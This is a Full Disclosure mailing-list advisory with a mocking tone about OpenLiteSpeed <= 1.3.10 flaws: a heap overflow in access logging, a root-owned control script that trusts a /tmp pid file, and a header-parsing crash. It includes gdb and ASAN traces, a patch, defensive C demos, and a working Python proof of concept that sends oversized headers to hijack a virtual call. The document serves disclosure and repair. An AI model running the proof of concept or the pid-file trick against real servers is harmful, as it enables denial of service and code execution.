[FD] Multiple Vulnerabilities in Openlitespeed <= 1.3.10 - CVE-b045-73d a.k.a. Analbleed.
- To: fulldisclosure@xxxxxxxxxxxx
- Subject: [FD] Multiple Vulnerabilities in Openlitespeed <= 1.3.10 - CVE-b045-73d a.k.a. Analbleed.
- From: Anal Bleed <analbleedlabs@xxxxxxxxx>
- Date: Wed, 13 May 2015 17:13:37 +0100
This is an irresponsible disclosure of the vulnerability which will bring
large parts of the Internet to its knees - CVE-b045-73d a.k.a. Analbleed.
Obviously you can find the fancy logo for it below (officially approved by
the security community and industry worldwide). You can also listen to the
O.S.T. on the vuln's official website, free of charge (for now), at
http://analbleed.com. If you are interested in purchasing t-shirts, cups,
stickers etc., visit our on-line shop on the same page. The special offer
also includes a vademecum covering all logo-branded vulns released so far.
You can now focus on studying their names, logos and more instead of
actually doing your own research.
Knowing life, the logo formatting will break ;P But not to worry, my friend.
Visit the official web page to please your eyes with it.</rant>
http://en.wikipedia.org/wiki/LiteSpeed_Technologies_Inc.: "May 2013: It is
used by 2% of all websites according to W3Techs,[9] making it the 4th most
popular web server."
Yup, whatever. Please, think of the kittens -
http://en.wikipedia.org/wiki/Every_time_you_masturbate..._God_kills_a_kitten
Ok, here comes the Analbleed pain...
[ASCII-art Analbleed logo, mangled by line wrapping; the intact rendering is at http://analbleed.com]
Bigger the better. Don't you think?
source:
=======
int Appender::append(LoggingEvent *pEvent)
{
    char achBuf[9000];
    char *pMessage = achBuf;
    int len;
    if (!pEvent)
        return -1;
    Layout *pLayout;
    if (pEvent->m_pLayout)
        pLayout = pEvent->m_pLayout;
    else
        pLayout = m_pLayout;    // this path is taken; m_pLayout sits on the overwritten heap
    if (pLayout)
        len = pLayout->format(pEvent, pMessage, sizeof(achBuf));    // SIGSEGV here
    else
    {
        pMessage = (char *)pEvent->m_pMessageBuf;
        len = pEvent->m_iMessageLen;
    }
    return append(pMessage, len);
}
gdb (aftermath):
================
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x0
RBX: 0x7df6f0 --> 0x4f61d0 --> 0x4b9480 (<log4cxx::FileAppender::~FileAppender()>: mov QWORD PTR [rdi],0x4df2b0)
RCX: 0x2328 ('(#')
RDX: 0x7fffffffa050 ("2015-04-14 13:13:26.670 [NOTICE] [127.0.0.1:34844] Http request header is too big, abandon!\n")
RSI: 0x7fffffffc390 --> 0x1388
RDI: 0x77f660 ('!' <repeats 200 times>...)
RBP: 0x7df780 --> 0x4f6110 --> 0x4b90b0 (<log4cxx::Logger::~Logger()>: mov QWORD PTR [rdi],0x4df2b0)
RSP: 0x7fffffffa050 ("2015-04-14 13:13:26.670 [NOTICE] [127.0.0.1:34844] Http request header is too big, abandon!\n")
RIP: 0x4b8c37 (<log4cxx::Appender::append(log4cxx::LoggingEvent*)+55>: call QWORD PTR [r8+0x18])
R8 : 0x2121212121212121 ('!!!!!!!!')
R9 : 0x1
R10: 0x552cf656
R11: 0x0
R12: 0x1388
R13: 0x0
R14: 0x7742c0 --> 0x7e4530 --> 0x54534f5000000000 ('')
R15: 0x1
EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
0x00000000004b8c37 in log4cxx::Appender::append (this=0x7df6f0,
pEvent=0x7fffffffc390) at appender.cpp:63
63 len = pLayout->format(pEvent, pMessage, sizeof(achBuf));
gdb-peda$ bt
#0 0x00000000004b8c37 in log4cxx::Appender::append (this=0x7df6f0,
pEvent=0x7fffffffc390) at appender.cpp:63
#1 0x00000000004b8fe8 in log4cxx::Logger::vlog (this=0x7df780,
level=level@entry=0x1388,
format=format@entry=0x4e5310 "[%s] Http request header is too big,
abandon!", args=args@entry=0x7fffffffe418,
no_linefeed=no_linefeed@entry=0x0)
at logger.cpp:111
#2 0x0000000000463876 in vnotice (args=0x7fffffffe418,
format=<optimized out>, this=<optimized out>) at
../../src/log4cxx/logger.h:106
#3 HttpLog::notice (pLogger=<optimized out>, fmt=fmt@entry=0x4e5310
"[%s] Http request header is too big, abandon!") at httplog.cpp:381
#4 0x000000000047e1f4 in HttpSession::readToHeaderBuf
(this=this@entry=0x774280) at httpsession.cpp:638
#5 0x000000000048422b in HttpSession::onReadEx (this=0x774280) at
httpsession.cpp:1645
#6 0x0000000000474205 in NtwkIOLink::handleEvents (this=0x778a10,
evt=<optimized out>) at ntwkiolink.cpp:310
#7 0x00000000004c4ccc in epoll::waitAndProcessEvents (this=0x7923f0,
iTimeoutMilliSec=<optimized out>) at epoll.cpp:190
#8 0x0000000000469de2 in EventDispatcher::run
(this=this@entry=0x7795c8) at eventdispatcher.cpp:219
#9 0x0000000000451450 in HttpServerImpl::start (this=0x7795a0) at
httpserver.cpp:406
#10 0x0000000000457ca9 in HttpServer::start (this=<optimized out>) at
httpserver.cpp:3216
#11 0x000000000044a700 in LshttpdMain::main (this=this@entry=0x779350,
argc=argc@entry=0x1, argv=argv@entry=0x7fffffffe758) at
lshttpdmain.cpp:930
#12 0x000000000044a672 in main (argc=argc@entry=0x1,
argv=argv@entry=0x7fffffffe758) at main.cpp:109
#13 0x00007ffff5cc9ec5 in __libc_start_main (main=0x44a640 <main(int,
char**)>, argc=0x1, argv=0x7fffffffe758, init=<optimized out>,
fini=<optimized out>,
rtld_fini=<optimized out>, stack_end=0x7fffffffe748) at libc-start.c:287
#14 0x000000000044be52 in _start ()
gdb-peda$ disas
Dump of assembler code for function
log4cxx::Appender::append(log4cxx::LoggingEvent*):
0x00000000004b8c00 <+0>: push rbx
0x00000000004b8c01 <+1>: sub rsp,0x2330
0x00000000004b8c08 <+8>: mov rax,QWORD PTR fs:0x28
0x00000000004b8c11 <+17>: mov QWORD PTR [rsp+0x2328],rax
0x00000000004b8c19 <+25>: xor eax,eax
0x00000000004b8c1b <+27>: test rsi,rsi
0x00000000004b8c1e <+30>: je 0x4b8c82
<log4cxx::Appender::append(log4cxx::LoggingEvent*)+130>
   0x00000000004b8c20 <+32>:  mov    rbx,rdi
   0x00000000004b8c23 <+35>:  mov    rdi,QWORD PTR [rsi+0x20]   ; 0x7fffffffc390 + 0x20 = 0x7fffffffc3b0 = 0x0 ?!?!?
   0x00000000004b8c27 <+39>:  test   rdi,rdi
   0x00000000004b8c2a <+42>:  je     0x4b8c70 <log4cxx::Appender::append(log4cxx::LoggingEvent*)+112>
   0x00000000004b8c2c <+44>:  mov    r8,QWORD PTR [rdi]         ; 0x77f660 -> '!' <repeats 200 times>...
   0x00000000004b8c2f <+47>:  mov    ecx,0x2328
   0x00000000004b8c34 <+52>:  mov    rdx,rsp
=> 0x00000000004b8c37 <+55>:  call   QWORD PTR [r8+0x18]        ; SIGSEGV on $r8 + 0x18 = 0x2121212121212139
0x00000000004b8c3b <+59>: mov rcx,rsp
0x00000000004b8c3e <+62>: mov edx,eax
0x00000000004b8c40 <+64>: mov r8,QWORD PTR [rbx]
0x00000000004b8c43 <+67>: mov rsi,rcx
0x00000000004b8c46 <+70>: mov rdi,rbx
0x00000000004b8c49 <+73>: call QWORD PTR [r8+0x38]
0x00000000004b8c4d <+77>: mov rcx,QWORD PTR [rsp+0x2328]
0x00000000004b8c55 <+85>: xor rcx,QWORD PTR fs:0x28
0x00000000004b8c5e <+94>: jne 0x4b8c89
<log4cxx::Appender::append(log4cxx::LoggingEvent*)+137>
0x00000000004b8c60 <+96>: add rsp,0x2330
0x00000000004b8c67 <+103>: pop rbx
0x00000000004b8c68 <+104>: ret
0x00000000004b8c69 <+105>: nop DWORD PTR [rax+0x0]
0x00000000004b8c70 <+112>: mov rdi,QWORD PTR [rbx+0x18]
0x00000000004b8c74 <+116>: test rdi,rdi
0x00000000004b8c77 <+119>: jne 0x4b8c2c
<log4cxx::Appender::append(log4cxx::LoggingEvent*)+44>
0x00000000004b8c79 <+121>: mov rcx,QWORD PTR [rsi+0x10]
0x00000000004b8c7d <+125>: mov edx,DWORD PTR [rsi+0x18]
0x00000000004b8c80 <+128>: jmp 0x4b8c40
<log4cxx::Appender::append(log4cxx::LoggingEvent*)+64>
0x00000000004b8c82 <+130>: mov eax,0xffffffff
0x00000000004b8c87 <+135>: jmp 0x4b8c4d
<log4cxx::Appender::append(log4cxx::LoggingEvent*)+77>
0x00000000004b8c89 <+137>: call 0x449720 <__stack_chk_fail@plt>
End of assembler dump.
gdb-peda$ p *(log4cxx::LoggingEvent*)$rsi
$5 = {
m_level = 0x1388,
m_flag = 0x0,
m_pLoggerName = 0x7df7d4 "Example",
m_pMessageBuf = 0x7fffffffc3d0 "[127.0.0.1:34846] Http request
header is too big, abandon!",
m_iMessageLen = 0x3a,
m_pLayout = 0x0,
m_timestamp = {
tv_sec = 0x552cf656,
tv_usec = 0xa5ec6
}
}
gdb-peda$ p *pLayout
$5 = {
<Duplicable> = {
_vptr.Duplicable = 0x2121212121212121,
m_sName = {
<AutoStr> = {
m_pStr = 0x2121212121212121 <error: Cannot access memory at
address 0x2121212121212121>
},
members of AutoStr2:
m_iStrLen = 0x21212121
}
},
members of log4cxx::Layout:
m_pUserData = 0x2121212121212121
}
ASAN:
=====
==24207==ERROR: AddressSanitizer: heap-buffer-overflow on address
0x62700000a100 at pc 0x7ffff5c1dd4c bp 0x7fffffffe0d0 sp
0x7fffffffe0a8
WRITE of size 2796 at 0x62700000a100 thread T0
#0 0x7ffff5c1dd4b in memmove
(/usr/lib/x86_64-linux-gnu/libasan.so.1+0x34d4b)
#1 0x488dda in AutoBuf::appendNoCheck(char const*, int)
(/home/jbieber/ospeed/bin/openlitespeed+0x488dda)
#2 0x488adb in AccessLog::appendStr(char const*, int)
/home/jbieber/openlitespeed-1.3.8/src/http/accesslog.cpp:652
// must be <= 4096
#3 0x48892b in AccessLog::log(HttpSession*)
/home/jbieber/openlitespeed-1.3.8/src/http/accesslog.cpp:627
// logs referer and user-agent hdrs
#4 0x4a2de0 in HttpVHost::logAccess(HttpSession*) const
/home/jbieber/openlitespeed-1.3.8/src/http/httpvhost.cpp:354
#5 0x4bb9ec in HttpSession::logAccess(int)
/home/jbieber/openlitespeed-1.3.8/src/http/httpsession.cpp:184
#6 0x4c012e in HttpSession::closeConnection()
/home/jbieber/openlitespeed-1.3.8/src/http/httpsession.cpp:1860
#7 0x4bbce3 in HttpSession::nextRequest()
/home/jbieber/openlitespeed-1.3.8/src/http/httpsession.cpp:266
// must be non keep-alive; best use HTTP/1.0
#8 0x4bf01c in HttpSession::handlerProcess(HttpHandler const*)
/home/jbieber/openlitespeed-1.3.8/src/http/httpsession.cpp:1371
#9 0x4bea64 in HttpSession::processURI(int)
/home/jbieber/openlitespeed-1.3.8/src/http/httpsession.cpp:1228
#10 0x4be070 in HttpSession::redirect(char const*, int, int)
/home/jbieber/openlitespeed-1.3.8/src/http/httpsession.cpp:1011
#11 0x4bf529 in HttpSession::sendHttpError(char const*)
/home/jbieber/openlitespeed-1.3.8/src/http/httpsession.cpp:1536
#12 0x4c49c9 in HttpSession::httpError(int, char const*)
../../src/http/httpsession.h:287
#13 0x4bfa62 in HttpSession::onReadEx()
/home/jbieber/openlitespeed-1.3.8/src/http/httpsession.cpp:1692
#14 0x4ace2a in NtwkIOLink::onRead(NtwkIOLink*)
/home/jbieber/openlitespeed-1.3.8/src/http/ntwkiolink.cpp:745
#15 0x4ab7d5 in NtwkIOLink::handleEvents(short)
/home/jbieber/openlitespeed-1.3.8/src/http/ntwkiolink.cpp:310
#16 0x52611c in epoll::waitAndProcessEvents(int)
/home/jbieber/openlitespeed-1.3.8/src/edio/epoll.cpp:261
#17 0x49efeb in EventDispatcher::run()
/home/jbieber/openlitespeed-1.3.8/src/http/eventdispatcher.cpp:219
#18 0x4769bc in HttpServerImpl::start()
/home/jbieber/openlitespeed-1.3.8/src/main/httpserver.cpp:406
#19 0x47e25f in HttpServer::start()
/home/jbieber/openlitespeed-1.3.8/src/main/httpserver.cpp:3216
#20 0x473dff in LshttpdMain::main(int, char**)
/home/jbieber/openlitespeed-1.3.8/src/main/lshttpdmain.cpp:930
#21 0x47181f in main /home/jbieber/openlitespeed-1.3.8/src/main.cpp:109
#22 0x7ffff4df1ec4 in __libc_start_main
(/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
#23 0x471698 (/home/jbieber/ospeed/bin/openlitespeed+0x471698)
0x62700000a100 is located 0 bytes to the right of 12288-byte region
[0x627000007100,0x62700000a100)
allocated by thread T0 here:
#0 0x7ffff5c3da96 in __interceptor_realloc
(/usr/lib/x86_64-linux-gnu/libasan.so.1+0x54a96)
#1 0x539e51 in AutoBuf::allocate(int)
/home/jbieber/openlitespeed-1.3.8/src/util/autobuf.cpp:42
#2 0x539dcd in AutoBuf::AutoBuf(int)
/home/jbieber/openlitespeed-1.3.8/src/util/autobuf.cpp:26
#3 0x487f46 in AccessLog::AccessLog()
/home/jbieber/openlitespeed-1.3.8/src/http/accesslog.cpp:446
#4 0x4a22a2 in HttpVHost::setAccessLogFile(char const*, int)
/home/jbieber/openlitespeed-1.3.8/src/http/httpvhost.cpp:194
#5 0x486837 in HttpLogSource::initAccessLog(XmlNode const*, long*)
/home/jbieber/openlitespeed-1.3.8/src/http/httplogsource.cpp:117
#6 0x4865d9 in HttpLogSource::initAccessLog(XmlNode const*, int)
/home/jbieber/openlitespeed-1.3.8/src/http/httplogsource.cpp:69
#7 0x4a7a76 in HttpVHost::config(XmlNode const*)
/home/jbieber/openlitespeed-1.3.8/src/http/httpvhost.cpp:2044
#8 0x4a8781 in HttpVHost::configVHost(XmlNode const*, char const*,
char const*, char const*, char const*, XmlNode const*)
/home/jbieber/openlitespeed-1.3.8/src/http/httpvhost.cpp:2307
#9 0x4a8a52 in HttpVHost::configVHost(XmlNode*)
/home/jbieber/openlitespeed-1.3.8/src/http/httpvhost.cpp:2370
#10 0x47ca8b in HttpServerImpl::configVHosts(XmlNode const*)
/home/jbieber/openlitespeed-1.3.8/src/main/httpserver.cpp:2227
#11 0x47db52 in HttpServerImpl::configServer(int, XmlNode*)
/home/jbieber/openlitespeed-1.3.8/src/main/httpserver.cpp:2586
#12 0x47df45 in HttpServerImpl::initServer(XmlNode*, int&, int)
/home/jbieber/openlitespeed-1.3.8/src/main/httpserver.cpp:2775
#13 0x47e7f1 in HttpServer::initServer(XmlNode*, int&, int)
/home/jbieber/openlitespeed-1.3.8/src/main/httpserver.cpp:3415
#14 0x473354 in LshttpdMain::config()
/home/jbieber/openlitespeed-1.3.8/src/main/lshttpdmain.cpp:629
#15 0x473aff in LshttpdMain::init(int, char**)
/home/jbieber/openlitespeed-1.3.8/src/main/lshttpdmain.cpp:846
#16 0x473de2 in LshttpdMain::main(int, char**)
/home/jbieber/openlitespeed-1.3.8/src/main/lshttpdmain.cpp:926
#17 0x47181f in main /home/jbieber/openlitespeed-1.3.8/src/main.cpp:109
#18 0x7ffff4df1ec4 in __libc_start_main
(/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 memmove
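The gdb session above shows the consequence (a virtual call through a Layout whose vptr is now 0x2121...), the ASAN trace the cause: AccessLog::appendStr decides whether to flush by looking at the single field's length and the buffer's total capacity, never at how much is already sitting in m_buf, so a handful of headers that are each under 4096 bytes add up past the 12288-byte region. The C program below is an added illustration and not code from OpenLiteSpeed: it models that flush decision with the unpatched rule next to a rule that counts the bytes already buffered, and runs a constructed sequence of field sizes (modelled on the header lengths in the PoC) through both. The buffer capacity and the 4096 cap are the figures from the trace and the source; everything else (the logbuf_t type, the function names) is made up for the demo, and the demo refuses the write rather than performing the out-of-bounds memmove the server does.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* 12288 is the size of the heap region in the ASAN report; 4096 is the
   per-field cap in the original appendStr check. */
#define LOG_BUF_CAP 12288
#define MAX_FIELD   4096

typedef struct {
    char   data[LOG_BUF_CAP];
    size_t size;     /* bytes currently buffered */
    size_t flushes;  /* how often the buffer was handed to the appender */
} logbuf_t;

typedef bool (*flush_policy_t)(const logbuf_t *, size_t);

/* Policy of the unpatched appendStr: only the field length and the total
   capacity are consulted; the current fill level is ignored. */
static bool vuln_needs_flush(const logbuf_t *b, size_t len)
{
    (void)b;
    return len > MAX_FIELD || LOG_BUF_CAP <= len + 2;
}

/* Hardened policy: bytes already buffered plus the two quote characters
   must still fit. */
static bool fixed_needs_flush(const logbuf_t *b, size_t len)
{
    return len > MAX_FIELD || b->size + len + 2 > LOG_BUF_CAP;
}

/* Append one quoted field under the given policy. Returns 0 on success and
   -1 if the policy admitted a write that would run past the buffer; the
   server would memmove() past the allocation at that point. */
static int append_quoted(logbuf_t *b, const char *s, size_t len,
                         flush_policy_t policy)
{
    if (policy(b, len)) {
        /* In the server the buffer is flushed and the field goes straight
           to the appender; the demo only records that a flush happened. */
        b->size = 0;
        b->flushes++;
        return 0;
    }
    if (b->size + len + 2 > LOG_BUF_CAP)
        return -1;                       /* demo guard instead of the overflow */
    b->data[b->size++] = '"';
    memcpy(b->data + b->size, s, len);
    b->size += len;
    b->data[b->size++] = '"';
    return 0;
}

/* Constructed field sizes, modelled on the header lengths used in the PoC.
   The first four are below the 4096 cap, the last two above it. */
static const size_t demo_lens[] = { 3609, 3679, 3740, 3935, 4157, 4117 };

/* Feed the demo fields through one policy; returns the index of the first
   field whose write would overflow, or -1 if the buffer stays in bounds. */
static int first_overflow(flush_policy_t policy)
{
    static char field[8192];
    memset(field, '!', sizeof field);    /* same filler byte as the PoC */
    logbuf_t b = { .size = 0, .flushes = 0 };
    size_t n = sizeof demo_lens / sizeof demo_lens[0];
    for (size_t i = 0; i < n; i++)
        if (append_quoted(&b, field, demo_lens[i], policy) < 0)
            return (int)i;
    return -1;
}

int main(void)
{
    printf("unpatched check: first overflowing field = %d\n",
           first_overflow(vuln_needs_flush));
    printf("patched check:   first overflowing field = %d\n",
           first_overflow(fixed_needs_flush));
    return 0;
}
```

Under the unpatched rule the fourth field is the one that tips 11034 buffered bytes past 12288 (each earlier field passed the per-field cap, so nothing was flushed); the hardened rule flushes there instead and the buffer never overruns. The point for anyone reviewing similar append/flush code: a cap on the individual item is not a cap on the accumulated total, and the guard has to compare against the space actually left in the buffer.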
poc:
====
#!/usr/bin/python
import sys
import struct
import socket
#
# openlitespeed v1.3.10:
#
# Kali:
# CANARY : ENABLED
# FORTIFY : disabled
# NX : ENABLED
# PIE : disabled
# RELRO : disabled
#
# Ubuntu:
# CANARY : ENABLED
# FORTIFY : ENABLED
# NX : ENABLED
# PIE : disabled
# RELRO : Partial
#
# 00400000-0052e000 r-xp 00000000 fc:00 323891
# /home/jbieber/src/openlitespeed-1.3.10/ol/bin/openlitespeed
# 0072d000-0072e000 r--p 0012d000 fc:00 323891
# /home/jbieber/src/openlitespeed-1.3.10/ol/bin/openlitespeed
# 0072e000-00735000 rw-p 0012e000 fc:00 323891
# /home/jbieber/src/openlitespeed-1.3.10/ol/bin/openlitespeed
# 00735000-007b0000 rw-p 00000000 00:00 0
# [heap]
# 007b0000-009d7000 rw-p 00000000 00:00 0
# [heap]
# 7ffffffde000-7ffffffff000 rw-p 00000000 00:00 0
# [stack]
#
# .data base: 0x00000000007e1100
# .data size: 0x001e1100
#
# for kernel.randomize_va_space=1 one can use .data segment which is
# holding the request
#
# for kernel.randomize_va_space=2 one need to brute-force in order to find
# the address holding our request
#
# final = .data_addr (brute-forced addr, e.g.: 0x8ab8c4) + 0xe32 (offset)
#
def sendnokeepalive(r):
h = 'localhost'
p = 8088
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((h, p))
s.send(r)
r = s.recv(4096)
s.close()
return s
if __name__ == '__main__':
daddr = int(sys.argv[1], 16) - 0x18 + 0xe32
r8_offset_addr = struct.pack('<Q', daddr)
print(" .data address: 0x%x") % daddr
gadget = 0x4141414141414141
final = struct.pack('<Q', gadget)
print("gadget address: 0x%x") % gadget
r1 = 'POST /w HTTP/0.9\n\rReferer: t\n\rUser-Agent: f\n\r\n\r'
r2 = 'POST /' + '!' * 3609 + ' HTTP/1.0\n'
r2 += 'Referer: ' + final + '!' * 3679 + '\n'
r2 += 'Content-Type: ' + '!' * 3740 + '\n'
r2 += 'Content-Type: ' + '!' * 3935 + '\n'
r2 += 'Content-Type: ' + '!' * 4157 + '\n'
r2 += 'Content-Type: ' + '!' * 4117 + '\n\n'
r3 = 'POST /' + '!' * 3609 + ' HTTP/1.0\n'
r3 += 'Referer: ' + 'AAAAAAAA' + '!' * 1500
r3 += r8_offset_addr + '!' * 2171 + '\n'
r3 += 'Content-Type: ' + '!' * 3740 + '\n'
r3 += 'Content-Type: ' + '!' * 3935 + '\n'
r3 += 'Content-Type: ' + '!' * 4157 + '\n'
r3 += 'Content-Type: ' + '!' * 4117 + '\n\n'
# XXX: should be 5 or 6 reqs in total, 'while'
# used for convenience during testing
while(1):
sendnokeepalive(r1)
sendnokeepalive(r2)
sendnokeepalive(r3)
sys.exit(0)
patch:
======
--- accesslog.cpp.orig 2015-04-23 23:11:31.265510318 +0200
+++ accesslog.cpp 2015-04-23 23:54:48.921496609 +0200
@@ -643,7 +643,7 @@ int AccessLog::appendStr(const char *pSt
if (*pStr)
{
m_buf.append('"');
- if ((len > 4096) || (m_buf.capacity() <= len + 2))
+ if ((len > 4096) || (m_buf.capacity() <= len + 2) ||
(m_buf.size() + len) >= LOG_BUF_SIZE)
{
flush();
m_pAppender->append(pStr, len);
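Review bot: the new term compares against the LOG_BUF_SIZE constant while the term beside it uses `m_buf.capacity()`; the two only agree if LOG_BUF_SIZE equals the size AccessLog::AccessLog() hands to AutoBuf (the 12288-byte region in the allocation trace), so it would be safer to write the guard against the buffer itself, e.g. `m_buf.size() + len + 2 > m_buf.capacity()` (size already contains the `'"'` appended just above; the extra 2 keeps room for the closing quote and is merely conservative if that quote is accounted for elsewhere), so that the check tracks the real allocation rather than a constant that may drift. The continuation line `(m_buf.size() + len) >= LOG_BUF_SIZE` carries no `+` marker, presumably mail wrapping, so the hunk will not apply as posted; rejoin it before use.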
bonus features:
===============
#1:
Neither /home/wrecking/ospeed/bin/lswsctrl.open nor make install checks
/tmp/lshttpd/ (who owns the directory or who may write the pid file in it).
-- cut --
$ id
uid=1003(wrecking) gid=1003(ball) groups=1003(ball),4(adm),27(sudo)
$ ls -lah /tmp/lshttpd/
total 15M
drwxr-xr-x 4 wrecking ball 4.0K Apr 1 16:50 .
drwxrwxrwt 12 root root 15M Apr 1 16:53 ..
drwxr-xr-x 2 wrecking ball 4.0K Mar 6 16:42 bak_core
-rw-r--r-- 1 wrecking ball 6 Apr 1 16:50 lshttpd.pid
-rw-r--r-- 1 wrecking ball 446 Apr 1 16:18 .rtreport
-rw-r--r-- 1 wrecking ball 174 Apr 1 16:17 .status
drwx------ 12 wrecking ball 4.0K Mar 16 12:25 swap
$ sudo nc -l localhost -p 6666 -v &
[1] 25222
$ Listening on [localhost] (family 0, port 6666)
$ ps axuwww | grep local
root 25222 0.0 0.0 73288 2132 pts/0 S+ 13:37 0:00 sudo nc -l
localhost -p 6666
root 25223 0.0 0.0 11224 784 pts/0 S+ 13:37 0:00 nc -l
localhost -p 6666
$ echo 25222 > /tmp/lshttpd/lshttpd.pid
$ sudo /home/wrecking/ospeed/bin/lswsctrl.open stop
[OK] litespeed: stopped.
$
[1]+ Exit 140 sudo nc -l localhost -p 6666 -v
$
-- cut --
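The transcript above shows why a pid file that any local user can write is a problem for a control script that runs as root: whatever number is in it gets a signal. The C program below is an added example, not the lswsctrl.open script or any OpenLiteSpeed code: it implements the check such a script should make before signalling, namely that the pid file is a regular file owned by the caller's effective uid, not writable by group or others, holds a plain integer, and that the process with that pid is actually the daemon (by name, via /proc/<pid>/comm). The demo path under /tmp, the daemon name "openlitespeed" and the helper names are assumptions for the demo; the 25222 planted in the file is the sudo pid from the transcript.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Read /proc/<pid>/comm into buf without the trailing newline.
   Returns 0 on success, -1 if the entry cannot be read. */
static int read_comm(pid_t pid, char *buf, size_t n)
{
    char path[64];
    snprintf(path, sizeof path, "/proc/%ld/comm", (long)pid);
    FILE *f = fopen(path, "r");
    if (!f)
        return -1;
    if (!fgets(buf, (int)n, f)) { fclose(f); return -1; }
    fclose(f);
    buf[strcspn(buf, "\n")] = '\0';
    return 0;
}

/* Return the pid stored in `pidfile` only if the file can be trusted:
   regular file (no symlink), owned by our effective uid, not group/world
   writable, containing a positive integer, and the named process really is
   `daemon_name`. Returns -1 on any doubt; the caller must not signal then. */
static pid_t trusted_pid(const char *pidfile, const char *daemon_name)
{
    int fd = open(pidfile, O_RDONLY | O_NOFOLLOW | O_CLOEXEC);
    if (fd < 0)
        return -1;
    struct stat st;
    if (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode) || st.st_uid != geteuid()
        || (st.st_mode & (S_IWGRP | S_IWOTH))) {
        close(fd);
        return -1;
    }
    char text[32] = {0};
    ssize_t r = read(fd, text, sizeof text - 1);
    close(fd);
    if (r <= 0)
        return -1;
    char *end;
    errno = 0;
    long pid = strtol(text, &end, 10);
    if (errno || end == text || pid <= 0 || (*end != '\0' && *end != '\n'))
        return -1;
    char comm[64];
    if (read_comm((pid_t)pid, comm, sizeof comm) < 0
        || strcmp(comm, daemon_name) != 0)
        return -1;
    return (pid_t)pid;
}

/* Demo helper: write `content` to `path` as a mode-0600 regular file. */
static int write_pidfile(const char *path, const char *content)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
    if (fd < 0)
        return -1;
    if (fchmod(fd, 0600) < 0) { close(fd); return -1; }
    size_t n = strlen(content);
    int rc = write(fd, content, n) == (ssize_t)n ? 0 : -1;
    close(fd);
    return rc;
}

/* Demo helper: plant our own pid under our own comm name. Returns 1 if
   trusted_pid() accepts it, 0 if it rejects it, -1 if /proc is unusable. */
static int demo_own_pid_accepted(const char *path)
{
    char comm[64], text[32];
    if (read_comm(getpid(), comm, sizeof comm) < 0)
        return -1;
    snprintf(text, sizeof text, "%ld\n", (long)getpid());
    if (write_pidfile(path, text) < 0)
        return -1;
    int ok = trusted_pid(path, comm) == getpid();
    unlink(path);
    return ok;
}

int main(void)
{
    const char *path = "/tmp/analbleed_demo.pid";   /* constructed demo path */
    write_pidfile(path, "25222\n");                   /* the planted sudo pid */
    printf("foreign pid accepted as openlitespeed? %s\n",
           trusted_pid(path, "openlitespeed") == -1 ? "no" : "yes");
    printf("own pid under its real name: %d\n", demo_own_pid_accepted(path));
    unlink(path);
    return 0;
}
```

Run as root the owner check means "root-owned", which the /tmp/lshttpd/ layout in the transcript cannot satisfy; the remaining fix is to keep the pid file in a root-owned directory rather than under /tmp.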
#2:
DoS while processing unknown headers. The PoC test case is now >20MB, so we
will spare the FD list and won't send it ;] Reading up on delta debugging is
in progress, sorry.
asan:
==3678==ERROR: AddressSanitizer: SEGV on unknown address
0x61d74683afcc (pc 0x0000004b477c sp 0x7fffd40198e0 bp 0x7fffd4019950
T0)
#0 0x4b477b in HttpReq::processHeaderLines()
/home/jbieber/openlitespeed-1.3.10/src/http/httpreq.cpp:543
#1 0x4b3990 in HttpReq::processHeader()
/home/jbieber/openlitespeed-1.3.10/src/http/httpreq.cpp:224
#2 0x4bce44 in HttpSession::readToHeaderBuf()
/home/jbieber/openlitespeed-1.3.10/src/http/httpsession.cpp:614
#3 0x4bf996 in HttpSession::onReadEx()
/home/jbieber/openlitespeed-1.3.10/src/http/httpsession.cpp:1645
#4 0x4acf54 in NtwkIOLink::onRead(NtwkIOLink*)
/home/jbieber/openlitespeed-1.3.10/src/http/ntwkiolink.cpp:745
#5 0x4ab8ff in NtwkIOLink::handleEvents(short)
/home/jbieber/openlitespeed-1.3.10/src/http/ntwkiolink.cpp:310
#6 0x527365 in epoll::waitAndProcessEvents(int)
/home/jbieber/openlitespeed-1.3.10/src/edio/epoll.cpp:190
#7 0x49f0f7 in EventDispatcher::run()
/home/jbieber/openlitespeed-1.3.10/src/http/eventdispatcher.cpp:219
#8 0x476abc in HttpServerImpl::start()
/home/jbieber/openlitespeed-1.3.10/src/main/httpserver.cpp:406
#9 0x47e34b in HttpServer::start()
/home/jbieber/openlitespeed-1.3.10/src/main/httpserver.cpp:3216
#10 0x473eff in LshttpdMain::main(int, char**)
/home/jbieber/openlitespeed-1.3.10/src/main/lshttpdmain.cpp:930
#11 0x47191f in main /home/jbieber/openlitespeed-1.3.10/src/main.cpp:109
#12 0x7f78c3e41ec4 in __libc_start_main
(/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
#13 0x471798 (/home/jbieber/ospeed/bin/openlitespeed+0x471798)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV
/home/jbieber/openlitespeed-1.3.10/src/http/httpreq.cpp:543
HttpReq::processHeaderLines()
==3678==ABORTING
source:
1.
int HttpReq::processHeaderLines()
{
    ...
    key_value_pair *pCurHeader = NULL;
    ...
    else
    {
        pCurHeader = newUnknownHeader();
        pCurHeader->keyOff = pLineBegin - m_headerBuf.begin();
    ...
2.
key_value_pair *newUnknownHeader()
{   return newKeyValueBuf(m_headerIdxOff);   }
3.
key_value_pair *HttpReq::newKeyValueBuf(int &idxOff)
{
    char *p = NULL;
    int orgSize;
    int newSize;
    int used;
    if (idxOff == 0)                     // idxOff = m_headerIdxOff = 0x3e4
    {
        orgSize = 0;
        used = 0;
    }
    else
    {
        p = m_reqBuf.getPointer(idxOff); // m_pBuf + idxOff = 0x61d00000cc64 -> 0x74682e3500000028
        orgSize = *((int *)p);           // 0x28
        used = *(((int *)p) + 1);        // 0x74682e35
    }
    if (used == orgSize)                 // path not taken
    {
        ...
    }
